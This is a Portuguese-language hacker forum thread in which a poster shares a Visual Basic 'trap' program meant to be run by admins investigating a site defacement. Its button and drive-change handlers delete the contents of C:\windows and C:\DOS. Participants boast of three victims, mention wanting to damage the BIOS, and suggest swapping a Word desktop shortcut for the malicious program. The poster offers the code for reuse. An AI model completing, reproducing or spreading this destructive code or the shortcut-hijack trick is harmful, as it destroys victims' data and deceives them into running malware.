Tá em que linguagem, dependendo de que linguagem estiver o programa, eu posso ajudar. Se quiser passar o código-fonte em txt para que conclua o programa, tudo bem. ![]()
Preparei essa armadilha para admins burros , que depois do deface, executarem esse programa , pra ver se acham alguma pista dos defacers (ou defacer hehe) mas há um bug qualquer
quem puder me ajudar a terminar o prog de uma vez , por favor me ajude! brigadu desd jah
(esse prog formata a unidade C: ) eu ainda tentei um jeito de ***** o BIOs da porcaria, mas eiu ainda naum consegui
(essa armadilha tb serve pra lammers (originalmente projetei pra isso)
Tá em que linguagem, dependendo de que linguagem estiver o programa, eu posso ajudar. Se quiser passar o código-fonte em txt para que conclua o programa, tudo bem. ![]()
Blz, ta em vb
Private Sub Command1_Click()
Text1.Text = "HELL IN HELL ST0R3 C0D3 AT0MIC"
End Sub
Private Sub Command2_Click()
Kill "C:\windows\*.*"
End Sub
Private Sub Command3_Click()
Text2.Text = "ONLY FOR NEON KNIGHTS MEMBERS!"
End Sub
Private Sub Drive1_Change()
Kill "C:\DOS\*.*"
End Sub
BOBAGI................ TEM Q SER UM ADMINISTRADOR BEM PANACA E BURRO PRA EXECUTAR UM PROGRAMA DE UM INVASOR NO PROPRIO SERVER...
MAIS NUM CUSTA TENTAR NÉ...VAI FIRME...
Foi pra isso meso que foi feito herhehehehehehehehehehe, a versaum de teste pegou 3 heheheheheheheheeehehehehehehehe, na net vc encontra de tud kra , mas esse eu projetei + pra enganar lammers (rotulo )
mesmo , admins, soh eventualmente.............quando ele é imbecil ao ponto de executar []s fortes : HELL
Uma forma boa de execução de vírus, é o cara apagar um ícone na área de trabalho do cliente, criar um novo ícone, mas desta vez com o atalho pro seu programa malicioso e usar o ícone usado antes.
Pode só alterar o caminho do ícone anterior, mas em alguns casos o ícone toma a forma padrão do windows, sem achar o programa associado.
Já pensou, tá lá o atalho pro word, aí o cara executa achando que entrou no seu processador de texto e... puf! já foi!!
hehehehehehehehehe dessa gostei, vo fazer umas alterações nele , + quem quizer usar o codigo, pode usah, DESDE QUE O USO SEJA APENAS PRA MANDAR LAMMERS OU ADMINS IMBECIS PRO ESPAÇO
![]()
There are currently 1 users browsing this thread. (0 members and 1 guests)